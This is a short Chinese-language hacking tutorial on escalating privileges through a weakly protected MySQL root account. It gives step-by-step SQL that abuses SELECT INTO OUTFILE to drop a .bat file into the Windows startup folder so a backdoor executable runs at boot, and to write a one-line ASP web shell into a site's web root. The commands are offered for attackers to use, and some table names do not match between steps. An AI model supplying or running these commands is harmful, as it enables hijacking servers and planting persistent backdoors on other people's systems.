MYSQL提权技巧

问题对象：有虚拟主机空间商．网站服务器 
过程：建立一个表→在表中输入我们的提权内容→出表→完成 
1.mysql默认开启3306端口．如果服务器默认密码不设置就是空密码．黑客们就可能利用该弱口令漏洞．来攻击我们的服务器． 
2.如果在得到用户名为：root 密码为：（空密码时候），黑客就可以攻击进我们网站的．答案他们利用导出一句话木马． 
3.黑客可以得到一个webshell然后．查看网站配置信息．就可以找到这个账号和密码.例如inc.php coon.asp等这些文件 
4.虚拟主机提供商，自己给我们的mysql账号和密码． 

一 
创建新表，开机自启动，来得到cmd，其命令如下： 
1：创建一个新的表 
create table nimabi (cmd text); 
含义:创建了一个新的表，表名为bycnboytest，表中只存放一个字段，字段名为cmd，为text文本］

2：运行我们的后门木马之类的东西．大家自己灵活．

insert into nimabi values ("（路径）c:\cmd11.exe " );

3：输出表为一个bat的脚本文件 
select * from bycnboytest into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\54td.bat"; 
导出一个文件文：54td.bat（c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\此路径才为开机自启动） 

二 

导出一句木马类：  

执行：show databases; 看服务器中有些什么数据库  

use test;进入数据库  

show tables;查看我们进入数据库中有些什么数据表

create table nimabi (cmd text); 创建一个新的表 
insert into nimabi values ("<%execute request("textarea1")%> " );在表中插入一句话木马内容

select * from nimabi into outfile "（导出到网站物理路径如）：D:\www\web\54td.asp";